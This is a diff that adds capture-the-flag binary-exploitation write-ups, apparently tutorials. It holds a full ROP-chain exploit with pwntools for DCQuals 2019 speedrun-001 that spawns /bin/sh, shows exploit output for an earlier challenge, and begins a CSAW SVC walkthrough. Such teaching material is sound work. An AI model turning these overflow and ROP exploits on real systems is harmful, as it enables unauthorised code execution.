+ target.sendline(payload1)
+
+ target.interactive()
+
+
+And when we run it:
+
+
+ [*] '/Hackery/utc/shelltime/libc6_2.27-3ubuntu1_i386.so'
+ Arch: i386-32-little
+ RELRO: Partial RELRO
+ Stack: Canary found
+ NX: NX enabled
+ PIE: PIE enabled
+ [*] '/Hackery/utc/shelltime/server'
+ Arch: i386-32-little
+ RELRO: Partial RELRO
+ Stack: No canary found
+ NX: NX enabled
+ PIE: No PIE (0x8048000)
+
+ Legend: buff MODIFIED padding MODIFIED
+ notsecret MODIFIED secret MODIFIED
+ return address MODIFIED
+ 0xffbba510 | 00 00 00 00 00 00 00 00 |
+ 0xffbba518 | 00 00 00 00 00 00 00 00 |
+ 0xffbba520 | 00 00 00 00 00 00 00 00 |
+ 0xffbba528 | 00 00 00 00 00 00 00 00 |
+ 0xffbba530 | ff ff ff ff ff ff ff ff |
+ 0xffbba538 | ff ff ff ff ff ff ff ff |
+ 0xffbba540 | c0 d5 ef f7 00 a0 04 08 |
+ 0xffbba548 | 58 a5 bb ff 8b 86 04 08 |
+ Return address:
+ 0x0804868b
+
+ Input some text:
+ Legend: buff MODIFIED padding MODIFIED
+ notsecret MODIFIED secret MODIFIED
+ return address MODIFIED
+ 0xffbba510 | 30 30 30 30 30 30 30 30 |
+ 0xffbba518 | 30 30 30 30 30 30 30 30 |
+ 0xffbba520 | 30 30 30 30 30 30 30 30 |
+ 0xffbba528 | 30 30 30 30 30 30 30 30 |
+ 0xffbba530 | 30 30 30 30 30 30 30 30 |
+ 0xffbba538 | 30 30 30 30 30 30 30 30 |
+ 0xffbba540 | 30 30 30 30 30 30 30 30 |
+ 0xffbba548 | 30 30 30 30 10 84 04 08 |
+ Return address:
+ 0x08048410
+
+
+
+ libc base: 0xf7d25000
+ [*] Switching to interactive mode
+
+ Legend: buff \x1b[32;1mMODIFIED padding MODIFIED
+ notsecret MODIFIED secret MODIFIED
+ return address MODIFIED
+ 0xffbba518 | 00 00 00 00 00 00 00 00 |
+ 0xffbba520 | 00 00 00 00 00 00 00 00 |
+ 0xffbba528 | 00 00 00 00 00 00 00 00 |
+ 0xffbba530 | 00 00 00 00 00 00 00 00 |
+ 0xffbba538 | ff ff ff ff ff ff ff ff |
+ 0xffbba540 | ff ff ff ff ff ff ff ff |
+ 0xffbba548 | 00 00 00 00 30 30 30 30 |
+ 0xffbba550 | 30 30 30 30 18 a0 04 08 |
+ Return address: 0x0804a018
+
+ Input some text:
+ Legend: buff MODIFIED padding MODIFIED
+ notsecret MODIFIED secret MODIFIED
+ return address MODIFIED
+ 0xffbba518 | 30 30 30 30 30 30 30 30 |
+ 0xffbba520 | 30 30 30 30 30 30 30 30 |
+ 0xffbba528 | 30 30 30 30 30 30 30 30 |
+ 0xffbba530 | 30 30 30 30 30 30 30 30 |
+ 0xffbba538 | 30 30 30 30 30 30 30 30 |
+ 0xffbba540 | 30 30 30 30 30 30 30 30 |
+ 0xffbba548 | 30 30 30 30 30 30 30 30 |
+ 0xffbba550 | 30 30 30 30 00 22 d6 f7 |
+ Return address: 0xf7d62200
+
+ $ cat flag.txt
+ utc{c0ntr0ling_r1p_1s_n0t_t00_h4rd}
+
+
+
+And we get the flag!
+
+## Title
+
+text
+
+
+
+
+` ![]()
+
+## Title
+
+text
+
+
+
+
+` ![]()
+
diff --git a/2/speed.md b/2/speed.md
new file mode 100644
index 0000000..7833edb
--- /dev/null
+++ b/2/speed.md
@@ -0,0 +1,534 @@
+# DCQuals 2019 speed
+
+## Downloading the binary file
+
+
+ [ 192.168.0.18/24 ] [ /dev/pts/14 ] [binexp/2/speed]
+ → wget https://github.com/guyinatuxedo/nightmare/raw/master/modules/07-bof_static/dcquals19_speedrun1/speedrun-001
+ --2021-03-05 21:19:04-- https://github.com/guyinatuxedo/nightmare/raw/master/modules/07-bof_static/dcquals19_speedrun1/speedrun-001
+ Loaded CA certificate '/etc/ssl/certs/ca-certificates.crt'
+ Resolving github.com (github.com)... 140.82.121.4
+ Connecting to github.com (github.com)|140.82.121.4|:443... connected.
+ HTTP request sent, awaiting response... 302 Found
+ Location: https://raw.githubusercontent.com/guyinatuxedo/nightmare/master/modules/07-bof_static/dcquals19_speedrun1/speedrun-001 [following]
+ --2021-03-05 21:19:04-- https://raw.githubusercontent.com/guyinatuxedo/nightmare/master/modules/07-bof_static/dcquals19_speedrun1/speedrun-001
+ Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 185.199.111.133, 185.199.109.133, 185.199.108.133, ...
+ Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|185.199.111.133|:443... connected.
+ HTTP request sent, awaiting response... 200 OK
+ Length: 774392 (756K) [application/octet-stream]
+ Saving to: ‘speedrun-001’
+
+ speedrun-001 100%[=======================================================================================================================================================>] 756.24K 2.40MB/s in 0.3s
+
+ 2021-03-05 21:19:05 (2.40 MB/s) - ‘speedrun-001’ saved [774392/774392]
+
+
+ [ 192.168.0.18/24 ] [ /dev/pts/14 ] [binexp/2/speed]
+ → file speedrun-001
+ speedrun-001: ELF 64-bit LSB executable, x86-64, version 1 (GNU/Linux), statically linked, for GNU/Linux 3.2.0, BuildID[sha1]=e9266027a3231c31606a432ec4eb461073e1ffa9, stripped
+
+ [ 192.168.0.18/24 ] [ /dev/pts/14 ] [binexp/2/speed]
+ → chmod +x speedrun-001
+
+
+
+` ![]()
+
+## Solution
+
+first let's run pwn checksec onto the binary and execute it to see what it does:
+
+
+ [ 192.168.0.18/24 ] [ /dev/pts/14 ] [binexp/2/speed]
+ → pwn checksec speedrun-001
+ [*] '/home/nothing/binexp/2/speed/speedrun-001'
+ Arch: amd64-64-little
+ RELRO: Partial RELRO
+ Stack: No canary found
+ NX: NX enabled
+ PIE: No PIE (0x400000)
+
+ [ 192.168.0.18/24 ] [ /dev/pts/14 ] [binexp/2/speed]
+ → ./speedrun-001
+ Hello brave new challenger
+ Any last words?
+ yes
+ This will be the last thing that you say: yes
+
+ Alas, you had no luck today.
+
+ [ 192.168.0.18/24 ] [ /dev/pts/14 ] [binexp/2/speed]
+ → ./speedrun-001
+ Hello brave new challenger
+ Any last words?
+ no
+ This will be the last thing that you say: no
+
+ Alas, you had no luck today.
+
+
+
+
+So here we have a 64bit statically compiled binary, the binary has NX which means Non Executable stack enabled, this means that the stack memory region is not executable, to get more info on this, we look at the binary from inside ghidra, however the main function isn't called 'main' as usual, this time we need to find where the output text is:
+
+[](http://ghidra.re/CheatSheet.html)
+
+We can use the CTRL+Shift+E to search for the program text line 'Any last words?' since it's safe to assume that it is in the main function
+
+
+
+Now we know the main function is **FUN_00400b60** and it has the following code:
+
+
+ void FUN_00400b60(void)
+
+ {
+ undefined local_408 [1024];
+
+ FUN_00410390("Any last words?");
+ FUN_004498a0(0,local_408,2000);
+ FUN_0040f710("This will be the last thing that you say: %s\n",local_408);
+ return;
+ }
+
+
+Here we see that our text gets put into the variable local_408 into a function called 'FUN_004498a0() which takes in 3 arguements, so let's investigate what this function really does:'
+
+
+ /* WARNING: Removing unreachable block (ram,0x00449910) */
+ /* WARNING: Removing unreachable block (ram,0x00449924) */
+
+ undefined8 FUN_004498a0(undefined8 param_1,undefined8 param_2,undefined8 param_3)
+
+ {
+ undefined4 uVar1;
+
+ if (DAT_006bc80c == 0) {
+ syscall();
+ return 0;
+ }
+ uVar1 = FUN_0044be40();
+ syscall();
+ FUN_0044bea0(uVar1,param_2,param_3);
+ return 0;
+ }
+
+
+
+So the function scans for our input (which is param_2) by making a syscall instead of using the usual fgets or scanf. Looking at the assembly code around the syscall we see the following:
+
+
+
+there is a xor call to set eax to 0 and thus the rax register is also set to 0, and we know that the rax register is important on the x86_64 architecture because this is what determines what our syscall ID is, you can check what those syscalls are [here](https://chromium.googlesource.com/chromiumos/docs/+/master/constants/syscalls.md#x86_64-64_bit):
+
+
+
+since rax is being set to 0 we are dealing with a read syscall, although we don't see the arguements being loaded for the syscall becasue they were already loaded when the function was called. Therefore the arguements this function takes, and the registers they take it in, are the same as the read syscall, so it can just call the read syscall after setting rax to zero (xoring eax with itself)
+
+
+ FUN_004498a0(0,local_408,2000);
+
+
+
+Looking back at the call to that function, we see that the third arguement is set to 2000, this means that the third arguement (param_3) gets passed into the syscall as an arguement, we can assume this is a limit to our text input variable (local_408) which can only hold 1024 bytes as it was initialized like so:
+
+
+ undefined local_408 [1024];
+
+
+
+Now here that we are scanning in 2000 bytes worth of input into our input value, which can only hold 1024 bytes, this means that there is an overflow that can potentially overflow and overwrite the return address to get code execution.
+
+The goal here is to create a ROP chain (Return Oriented Programming) and to use the buffer overflow to execute it. the ROP chain is made up of **ROP gadgets** , these are bits of code in the binary itself that end in a **ret** instruction
+
+We don't have to worry about the code being non-executable because this will be all valid code. Since PIE is disabled, we know the address of all of the binary file's instructions.
+
+Since the binary file is statically linked, that means it is a large binary with plenty of potential gadgets.
+
+The plan here is to make a ROP chain to make a execve() syscall to execute /bin/sh and to give us a shell. The required registers are the following:
+
+
+ rax: 59 #rax contains the syscall ID
+ rdi: ptr to "bin/sh" #rbx contains the first arguement (the file to execute)
+ rsi: 0 #rsi : 2nd arg
+ rdx: 0 #rdx : 3rd arg
+
+
+
+The ROP chain we will build will have 3 parts. First we write **/bin/sh** somewhere in memory, then move the pointer to it into the **rdi** register. Second, we move the necessary values into the other 3 registers. Third, we need to make the syscall itself.
+
+Now we need to find where in memory we can write **/bin/sh** To do so we check the memory mappings while the ELF is running to see what we have to work with. So let's first choose where we will put our breakpoint:
+
+
+
+
+ 00400ba1 b8 00 00 MOV EAX,0x0
+ 00 00
+ 00400ba6 e8 65 eb CALL FUN_0040f710 undefined FUN_0040f710(undefined
+ 00 00
+ 00400bab 90 NOP
+ 00400bac c9 LEAVE
+ 00400bad c3 RET
+
+
+
+So here we see that the last text output of the binary is at 0x400ba6 so we set our breakpoint right after at **0x400bab**
+
+
+ [ 192.168.0.18/24 ] [ /dev/pts/14 ] [binexp/2/speed]
+ → gdb ./speedrun-001
+ GNU gdb (GDB) 10.1
+ Copyright (C) 2020 Free Software Foundation, Inc.
+ License GPLv3+: GNU GPL version 3 or later
+ This is free software: you are free to change and redistribute it.
+ There is NO WARRANTY, to the extent permitted by law.
+ Type "show copying" and "show warranty" for details.
+ This GDB was configured as "x86_64-pc-linux-gnu".
+ Type "show configuration" for configuration details.
+ For bug reporting instructions, please see:
+ .
+ Find the GDB manual and other documentation resources online at:
+ .
+
+ For help, type "help".
+ Type "apropos word" to search for commands related to "word"...
+ GEF for linux ready, type `gef' to start, `gef config' to configure
+ 92 commands loaded for GDB 10.1 using Python engine 3.9
+ Reading symbols from ./speedrun-001...
+ (No debugging symbols found in ./speedrun-001)
+ gef➤ b *0x400bab
+ Breakpoint 1 at 0x400bab
+ gef➤ r
+ Starting program: /home/nothing/binexp/2/speed/speedrun-001
+ Hello brave new challenger
+ Any last words?
+ 13371337
+ This will be the last thing that you say: 13371337
+
+
+ Breakpoint 1, 0x0000000000400bab in ?? ()
+ [ Legend: Modified register | Code | Heap | Stack | String ]
+ ───────────────────────────────────────────────────────────────────────────────────────────────────────────────── registers ────
+ $rax : 0x34
+ $rbx : 0x0000000000400400 → sub rsp, 0x8
+ $rcx : 0x0
+ $rdx : 0x00000000006bbd30 → 0x0000000000000000
+ $rsp : 0x00007fffffffdad0 → "13371337\n"
+ $rbp : 0x00007fffffffded0 → 0x00007fffffffdef0 → 0x0000000000401900 → push r15
+ $rsi : 0x0
+ $rdi : 0x1
+ $rip : 0x0000000000400bab → nop
+ $r8 : 0x34
+ $r9 : 0x34
+ $r10 : 0xfffffff7
+ $r11 : 0x246
+ $r12 : 0x00000000004019a0 → push rbp
+ $r13 : 0x0
+ $r14 : 0x00000000006b9018 → 0x0000000000443e60 → mov rcx, rsi
+ $r15 : 0x0
+ $eflags: [zero carry parity adjust sign trap INTERRUPT direction overflow resume virtualx86 identification]
+ $cs: 0x0033 $ss: 0x002b $ds: 0x0000 $es: 0x0000 $fs: 0x0000 $gs: 0x0000
+ ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────── stack ────
+ 0x00007fffffffdad0│+0x0000: "13371337\n" ← $rsp
+ 0x00007fffffffdad8│+0x0008: 0x000000000000000a
+ 0x00007fffffffdae0│+0x0010: 0x0000000000000000
+ 0x00007fffffffdae8│+0x0018: 0x0000000000000000
+ 0x00007fffffffdaf0│+0x0020: 0x0000000000000000
+ 0x00007fffffffdaf8│+0x0028: 0x0000000000000000
+ 0x00007fffffffdb00│+0x0030: 0x0000000000000000
+ 0x00007fffffffdb08│+0x0038: 0x0000000000000000
+ ─────────────────────────────────────────────────────────────────────────────────────────────────────────────── code:x86:64 ────
+ 0x400b9a lea rdi, [rip+0x919b7] # 0x492558
+ 0x400ba1 mov eax, 0x0
+ 0x400ba6 call 0x40f710
+ ●→ 0x400bab nop
+ 0x400bac leave
+ 0x400bad ret
+ 0x400bae push rbp
+ 0x400baf mov rbp, rsp
+ 0x400bb2 lea rdi, [rip+0x919cd] # 0x492586
+ ─────────────────────────────────────────────────────────────────────────────────────────────────────────────────── threads ────
+ [#0] Id 1, Name: "speedrun-001", stopped 0x400bab in ?? (), reason: BREAKPOINT
+ ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────── trace ────
+ [#0] 0x400bab → nop
+ [#1] 0x400c1d → mov eax, 0x0
+ [#2] 0x4011a9 → mov edi, eax
+ [#3] 0x400a5a → hlt
+ ────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
+ gef➤
+
+
+
+So here we basically used gdb to set the breakpoint at **0x400bab** and then we ran the binary, putting 13371337 as our input text so that it is an easy pattern to find in memory. So before we check for where our pattern is in memory, let's check the memory mappings to see what we have to work with:
+
+
+ gef➤ vmmap
+ [ Legend: Code | Heap | Stack ]
+ Start End Offset Perm Path
+ 0x0000000000400000 0x00000000004b6000 0x0000000000000000 r-x /home/nothing/binexp/2/speed/speedrun-001
+ 0x00000000006b6000 0x00000000006bc000 0x00000000000b6000 rw- /home/nothing/binexp/2/speed/speedrun-001
+ 0x00000000006bc000 0x00000000006e0000 0x0000000000000000 rw- [heap]
+ 0x00007ffff7ff9000 0x00007ffff7ffd000 0x0000000000000000 r-- [vvar]
+ 0x00007ffff7ffd000 0x00007ffff7fff000 0x0000000000000000 r-x [vdso]
+ 0x00007ffffffde000 0x00007ffffffff000 0x0000000000000000 rw- [stack]
+ 0xffffffffff600000 0xffffffffff601000 0x0000000000000000 --x [vsyscall]
+
+
+
+Now here we see the elf memory region between **0x6b6000** and **0x6bc000** because this is from the elf's memory space that does not have PIE, therefore we know what the address is without an infoleak. In addition to that, the permissions are **rw** as you can see on the right, which means that we can read and write to it. Since the space in between the aforementionned memory addresses is only zeroes, we shouldn't mess anything up if we store it here. So let's find the offset between the start of our input where our **13371337** pattern is:
+
+
+ gef➤ search-pattern 13371337
+ [+] Searching '13371337' in memory
+ [+] In '[stack]'(0x7ffffffde000-0x7ffffffff000), permission=rw-
+ 0x7fffffffb46a - 0x7fffffffb476 → "13371337\n\n"
+ 0x7fffffffdad0 - 0x7fffffffdada → "13371337\n"
+
+ gef➤ info frame
+ Stack level 0, frame at 0x7fffffffdee0:
+ rip = 0x400bab; saved rip = 0x400c1d
+ called by frame at 0x7fffffffdf00
+ Arglist at 0x7fffffffdac8, args:
+ Locals at 0x7fffffffdac8, Previous frame's sp is 0x7fffffffdee0
+ Saved registers:
+ rbp at 0x7fffffffded0, rip at 0x7fffffffded8
+
+
+
+Here we see that our input address is at **0x7fffffffdad0** and the return address is at **0x7fffffffded8** , Now let's calculate the offset between the 2 addresses:
+
+
+ [ 192.168.0.18/24 ] [ /dev/pts/6 ] [blog/binexp/2]
+ → python3
+ Python 3.9.2 (default, Feb 20 2021, 18:40:11)
+ [GCC 10.2.0] on linux
+ Type "help", "copyright", "credits" or "license" for more information.
+ >>> hex( 0x7fffffffdad0 - 0x7fffffffded8 )
+ '-0x408'
+
+
+
+Now we know that have an offset of 0x408 bytes between our input text and the return function. Next step is to find the ROP Gadgets we will use. To do so we will use ROPGadgets.py you can check out how we installed it in the previous tutorial [here](calc.html). Now let's find the gadgets we need for the **rax, rdi, rsi and rdx** registers using the following template:
+
+
+ "pop register ; ret"
+
+
+
+
+ [ 192.168.0.18/24 ] [ /dev/pts/14 ] [binexp/2/speed]
+ → ROPgadget --binary speedrun-001 | grep "pop rax ; ret"
+ 0x0000000000415662 : add ch, al ; pop rax ; ret
+ 0x0000000000415661 : cli ; add ch, al ; pop rax ; ret
+ 0x00000000004a9321 : in al, 0x4c ; pop rax ; retf
+ 0x0000000000415664 : pop rax ; ret
+ 0x000000000048cccb : pop rax ; ret 0x22
+ 0x00000000004a9323 : pop rax ; retf
+ 0x00000000004758a3 : ror byte ptr [rax - 0x7d], 0xc4 ; pop rax ; ret
+
+ [ 192.168.0.18/24 ] [ /dev/pts/14 ] [binexp/2/speed]
+ → ROPgadget --binary speedrun-001 | grep "pop rdi ; ret"
+ 0x0000000000423788 : add byte ptr [rax - 0x77], cl ; fsubp st(0) ; pop rdi ; ret
+ 0x000000000042378b : fsubp st(0) ; pop rdi ; ret
+ 0x0000000000400686 : pop rdi ; ret
+
+ [ 192.168.0.18/24 ] [ /dev/pts/14 ] [binexp/2/speed]
+ → ROPgadget --binary speedrun-001 | grep "pop rsi ; ret"
+ 0x000000000046759d : add byte ptr [rbp + rcx*4 + 0x35], cl ; pop rsi ; ret
+ 0x000000000048ac68 : cmp byte ptr [rbx + 0x41], bl ; pop rsi ; ret
+ 0x000000000044be39 : pop rdx ; pop rsi ; ret
+ 0x00000000004101f3 : pop rsi ; ret
+
+ [ 192.168.0.18/24 ] [ /dev/pts/14 ] [binexp/2/speed]
+ → ROPgadget --binary speedrun-001 | grep "pop rdx ; ret"
+ 0x00000000004a8881 : js 0x4a88fe ; pop rdx ; retf
+ 0x00000000004498b5 : pop rdx ; ret
+ 0x000000000045fe71 : pop rdx ; retf
+
+
+
+So we have found the following gadget addresses for each of our registers:
+
+
+ rax 415664
+ rdi 400686
+ rsi 4101f3
+ rdx 4498b5
+
+
+
+Next we will need a gadget which will write the string **/bin/sh** somewhere in memory, for this we just look through all the gadgets with a mov instruction, we want a rax pointer and the gadget must end with **; ret** :
+
+
+ [ 192.168.0.18/24 ] [ /dev/pts/2 ] [binexp/2/speed]
+ → ROPgadget --binary speedrun-001 | grep "mov" | grep "ptr \[rax\]" | grep "; ret$"
+
+
+
+Looking through for the shortest (and simplest) instructions we find the following:
+
+
+ 0x000000000048d251 : mov qword ptr [rax], rdx ; ret
+
+
+
+This gadget will allow us to write an 8 byte value stored in **rdx** to whatever address is pointed to by the **rax** register. In addition this is convenient becuase we can use the 4 gadgets we found earlier to prepare this write. And lastly we need to find a gadget to actually make the syscall:
+
+
+ [ 192.168.0.18/24 ] [ /dev/pts/14 ] [binexp/2/speed]
+ → ROPgadget --binary speedrun-001 | grep "syscall"
+
+ [...]
+
+ 0x000000000040dbdd : sub dword ptr [rsp + 0xf0], eax ; syscall
+ 0x0000000000475453 : sub esp, 8 ; syscall
+ 0x0000000000475452 : sub rsp, 8 ; syscall
+ 0x000000000040129c : syscall
+
+ [...]
+
+
+
+And we have our syscall gadget at 0x40129c. With all of the above, we can finally construct our ROP chain, so we will overwrite the return address with the first gadget of the rop chain, and when it returns it will keep on going down the chain until we get our shell. To move the values into registers, we store the values on the stack inside the ROP chain, and they will be popped off into registers. So we end up with the following exploit:
+
+
+ from pwn import *
+
+ target = process('./speedrun-001')
+
+ # Establish our ROP Gadgets
+ popRax = p64(0x415664)
+ popRdi = p64(0x400686)
+ popRsi = p64(0x4101f3)
+ popRdx = p64(0x4498b5)
+
+ # 0x000000000048d251 : mov qword ptr [rax], rdx ; ret
+ writeGadget = p64(0x48d251)
+
+ # Our syscall gadget
+ syscall = p64(0x40129c)
+
+ '''
+ Here is the assembly equivalent for these blocks
+ write "/bin/sh" to 0x6b6000
+
+ pop rdx, 0x2f62696e2f736800
+ pop rax, 0x6b6000
+ mov qword ptr [rax], rdx
+ '''
+ rop = b""
+ rop += popRdx
+ rop += b"/bin/sh\x00" # The string "/bin/sh" in hex with a null byte at the end
+ rop += popRax
+ rop += p64(0x6b6000)
+ rop += writeGadget
+
+ '''
+ Prepare the four registers with their arguments, and make the syscall
+
+ pop rax, 0x3b
+ pop rdi, 0x6b6000
+ pop rsi, 0x0
+ pop rdx, 0x0
+
+ syscall
+ '''
+
+ rop += popRax
+ rop += p64(0x3b)
+
+ rop += popRdi
+ rop += p64(0x6b6000)
+
+ rop += popRsi
+ rop += p64(0)
+ rop += popRdx
+ rop += p64(0)
+
+ rop += syscall
+
+
+ # Add the padding to the saved return address
+ payload = b"\x00"*0x408 + rop
+
+ print(hexdump(payload))
+
+
+
+Let's run the exploit to see the hexdump of our payload:
+
+
+ [ 192.168.0.18/24 ] [ /dev/pts/2 ] [binexp/2/speed]
+ → python3 exploit.py
+ [+] Starting local process './speedrun-001': pid 2115567
+ 00000000 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 │····│····│····│····│
+ *
+ 00000400 00 00 00 00 00 00 00 00 b5 98 44 00 00 00 00 00 │····│····│··D·│····│
+ 00000410 2f 62 69 6e 2f 73 68 00 64 56 41 00 00 00 00 00 │/bin│/sh·│dVA·│····│
+ 00000420 00 60 6b 00 00 00 00 00 51 d2 48 00 00 00 00 00 │·`k·│····│Q·H·│····│
+ 00000430 64 56 41 00 00 00 00 00 3b 00 00 00 00 00 00 00 │dVA·│····│;···│····│
+ 00000440 86 06 40 00 00 00 00 00 00 60 6b 00 00 00 00 00 │··@·│····│·`k·│····│
+ 00000450 f3 01 41 00 00 00 00 00 00 00 00 00 00 00 00 00 │··A·│····│····│····│
+ 00000460 b5 98 44 00 00 00 00 00 00 00 00 00 00 00 00 00 │··D·│····│····│····│
+ 00000470 9c 12 40 00 00 00 00 00 │··@·│····│
+ 00000478
+
+
+
+Now that we see our payload is correct, we send it to the binary file with the following 2 lines:
+
+
+ target.sendline(payload)
+ target.interactive()
+
+
+
+Now let's run the exploit to see if everything works as intended:
+
+
+ [ 192.168.0.18/24 ] [ /dev/pts/2 ] [binexp/2/speed]
+ → python3 exploit.py
+ [+] Starting local process './speedrun-001': pid 2146710
+ 00000000 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 │····│····│····│····│
+ *
+ 00000400 00 00 00 00 00 00 00 00 b5 98 44 00 00 00 00 00 │····│····│··D·│····│
+ 00000410 2f 62 69 6e 2f 73 68 00 64 56 41 00 00 00 00 00 │/bin│/sh·│dVA·│····│
+ 00000420 00 60 6b 00 00 00 00 00 51 d2 48 00 00 00 00 00 │·`k·│····│Q·H·│····│
+ 00000430 64 56 41 00 00 00 00 00 3b 00 00 00 00 00 00 00 │dVA·│····│;···│····│
+ 00000440 86 06 40 00 00 00 00 00 00 60 6b 00 00 00 00 00 │··@·│····│·`k·│····│
+ 00000450 f3 01 41 00 00 00 00 00 00 00 00 00 00 00 00 00 │··A·│····│····│····│
+ 00000460 b5 98 44 00 00 00 00 00 00 00 00 00 00 00 00 00 │··D·│····│····│····│
+ 00000470 9c 12 40 00 00 00 00 00 │··@·│····│
+ 00000478
+ [*] Switching to interactive mode
+ Hello brave new challenger
+ Any last words?
+ This will be the last thing that you say:
+ $ cat flag.txt
+ flag{g0ttem_b0yz}
+ $ id
+ uid=1000(nothing) gid=1000(nothing) groups=1000(nothing),90(network),98(power),972(libvirt),988(storage),990(optical),995(audio),998(wheel)
+ $
+
+
+
+And that's it! We have been able to spawn a shell and print out the flag!
+
+## Title
+
+text
+
+
+
+
+` ![]()
+
+## Title
+
+text
+
+
+
+
+` ![]()
+
diff --git a/2/svc.md b/2/svc.md
new file mode 100644
index 0000000..530570d
--- /dev/null
+++ b/2/svc.md
@@ -0,0 +1,604 @@
+# Csaw 2017 SVC
+
+## Downloading the binary file
+
+
+ [ 192.168.0.18/24 ] [ /dev/pts/2 ] [binexp/2/svc]
+ → wget -q https://github.com/guyinatuxedo/nightmare/raw/master/modules/08-bof_dynamic/csawquals17_svc/svc
+
+ [ 192.168.0.18/24 ] [ /dev/pts/2 ] [binexp/2/svc]
+ → wget -q https://github.com/guyinatuxedo/nightmare/raw/master/modules/08-bof_dynamic/csawquals17_svc/core
+
+ [ 192.168.0.18/24 ] [ /dev/pts/2 ] [binexp/2/svc]
+ → wget -q https://github.com/guyinatuxedo/nightmare/raw/master/modules/08-bof_dynamic/csawquals17_svc/libc-2.23.so
+
+ [ 192.168.0.18/24 ] [ /dev/pts/2 ] [binexp/2/svc]
+ → chmod +x svc ; ls -lash
+ total 7.6M
+ 4.0K drwxr-xr-x 2 nothing nothing 4.0K Mar 6 16:16 .
+ 4.0K drwxr-xr-x 11 nothing nothing 4.0K Mar 6 16:14 ..
+ 5.8M -rw-r--r-- 1 nothing nothing 5.8M Mar 6 16:16 core
+ 1.8M -rw-r--r-- 1 nothing nothing 1.8M Mar 6 16:16 libc-2.23.so
+ 12K -rwxr-xr-x 1 nothing nothing 11K Mar 6 16:16 svc
+
+
+
+` ![]()
+
+## Solution
+
+Now let's check out what the binary does when we execute it after using pwn checksec on it:
+
+
+ [ 192.168.0.18/24 ] [ /dev/pts/2 ] [binexp/2/svc]
+ → pwn checksec svc
+ [*] '/home/nothing/binexp/2/svc/svc'
+ Arch: amd64-64-little
+ RELRO: Partial RELRO
+ Stack: Canary found
+ NX: NX enabled
+ PIE: No PIE (0x400000)
+
+ [ 192.168.0.18/24 ] [ /dev/pts/2 ] [binexp/2/svc]
+ → ./svc
+ -------------------------
+ [*]SCV GOOD TO GO,SIR....
+ -------------------------
+ 1.FEED SCV....
+ 2.REVIEW THE FOOD....
+ 3.MINE MINERALS....
+ -------------------------
+ >>1
+
+
+So we see that this is a 64bit dynamically linked binary, it has a stack canary and a non executable stack (NX). Basically, the binary asks us if we want to 1) feed the csv with some text input, 2) review what we just put in, or 3 to quit.
+
+
+ -------------------------
+ [*]SCV IS ALWAYS HUNGRY.....
+ -------------------------
+ [*]GIVE HIM SOME FOOD.......
+ -------------------------
+ >>foodfoodfood
+ -------------------------
+ [*]SCV GOOD TO GO,SIR....
+ -------------------------
+ 1.FEED SCV....
+ 2.REVIEW THE FOOD....
+ 3.MINE MINERALS....
+ -------------------------
+ >>2
+ -------------------------
+ [*]REVIEW THE FOOD...........
+ -------------------------
+ [*]PLEASE TREAT HIM WELL.....
+ -------------------------
+ foodfoodfood
+
+ -------------------------
+ [*]SCV GOOD TO GO,SIR....
+ -------------------------
+ 1.FEED SCV....
+ 2.REVIEW THE FOOD....
+ 3.MINE MINERALS....
+ -------------------------
+ >>1
+
+
+
+ -------------------------
+ [*]SCV IS ALWAYS HUNGRY.....
+ -------------------------
+ [*]GIVE HIM SOME FOOD.......
+ -------------------------
+ >>feedfeedfeed
+ -------------------------
+ [*]SCV GOOD TO GO,SIR....
+ -------------------------
+ 1.FEED SCV....
+ 2.REVIEW THE FOOD....
+ 3.MINE MINERALS....
+ -------------------------
+ >>2
+ -------------------------
+ [*]REVIEW THE FOOD...........
+ -------------------------
+ [*]PLEASE TREAT HIM WELL.....
+ -------------------------
+ feedfeedfeed
+
+ -------------------------
+ [*]SCV GOOD TO GO,SIR....
+ -------------------------
+ 1.FEED SCV....
+ 2.REVIEW THE FOOD....
+ 3.MINE MINERALS....
+ -------------------------
+ >>3
+ [*]BYE ~ TIME TO MINE MIENRALS...
+
+
+
+Now that we see how the binary works approximately, let's check it out inside of ghidra:
+
+
+
+Since the main function of the binary is not called 'main' we just search (CTRL+SHIFT+E) in ghidra for one of the keywords that the binary previously gave us like the 'FEED' word and thus we find that the main function is FUN_00400a96, and is quite gigantic so we're going to only focus on the parts we need:
+
+
+ undefined8 FUN_00400a96(void)
+
+ {
+ while (local_c0 != 0) {
+ pbVar1 = std::operator<<((basic_ostream *)std::cout,"-------------------------");
+
+ [...]
+
+ std::operator<<((basic_ostream *)std::cout,">>");
+ std::basic_istream>::operator>>
+ ((basic_istream> *)std::cin,&local;_c4);
+
+ if (local_c4 == 2) {
+ }
+
+ if (local_c4 == 2) {
+ pbVar1 = std::operator<<((basic_ostream *)std::cout,"-------------------------");
+ std::basic_ostream>::operator<<
+ }
+
+ if (local_c4 == 3) {
+
+ }
+
+ [...]
+
+ }
+
+ }
+
+
+
+
+First of all we see that we enter a while loop, and for each iteration of the loop it prompts us for a menu option in local_c4. for the option to scan in data (option 1) we see the following:
+
+
+ if (local_c4 == 1) {
+
+ [...]
+
+ sVar2 = read(0,local_b8,0xf8);
+ local_bc = (undefined4)sVar2;
+ }
+ else {
+ pbVar1 = std::operator<<((basic_ostream *)std::cout,"[*]DO NOT HURT MY SCV....");
+ std::basic_ostream>::operator<<
+ ((basic_ostream> *)pbVar1,
+ std::endl>);
+ }
+
+
+we see that it uses the read() function to scan in **0xf8** bytes of data into the input variable called **local_b8** Now let's set our breakpoint right after the read() call at 0x400cd3:
+
+
+
+
+ [ 192.168.0.18/24 ] [ /dev/pts/2 ] [binexp/2/svc]
+ → gdb ./svc
+ GNU gdb (GDB) 10.1
+ Copyright (C) 2020 Free Software Foundation, Inc.
+ License GPLv3+: GNU GPL version 3 or later
+ This is free software: you are free to change and redistribute it.
+ There is NO WARRANTY, to the extent permitted by law.
+ Type "show copying" and "show warranty" for details.
+ This GDB was configured as "x86_64-pc-linux-gnu".
+ Type "show configuration" for configuration details.
+ For bug reporting instructions, please see:
+ .
+ Find the GDB manual and other documentation resources online at:
+ .
+
+ For help, type "help".
+ Type "apropos word" to search for commands related to "word"...
+ GEF for linux ready, type `gef' to start, `gef config' to configure
+ 92 commands loaded for GDB 10.1 using Python engine 3.9
+ Reading symbols from ./svc...
+ (No debugging symbols found in ./svc)
+ gef➤ b *0x400cd3
